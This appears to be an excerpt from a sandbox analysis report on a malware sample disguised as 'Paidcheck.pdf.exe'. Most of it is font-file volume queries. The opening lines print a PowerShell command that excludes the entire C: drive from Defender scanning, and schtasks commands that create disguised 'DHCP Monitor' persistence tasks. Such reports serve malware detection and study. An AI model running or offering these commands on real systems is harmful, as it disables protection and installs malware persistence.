      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
      Source: RegAsm.exe, 0000000A.00000002.482649400.0000000002D4A000.00000004.00000001.sdmpBinary or memory string: Program Manager F
      Source: RegAsm.exe, 0000000A.00000002.485915733.0000000003212000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: RegAsm.exe, 0000000A.00000002.489937133.0000000006CBB000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager
      Source: RegAsm.exe, 0000000A.00000002.479713175.0000000001460000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: RegAsm.exe, 0000000A.00000002.488221357.00000000060BD000.00000004.00000001.sdmpBinary or memory string: Program Managerram Manager
      Source: RegAsm.exe, 0000000A.00000002.490208871.0000000006FEC000.00000004.00000001.sdmpBinary or memory string: Program Manager
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Users\user\Desktop\Paidcheck.pdf.exe VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
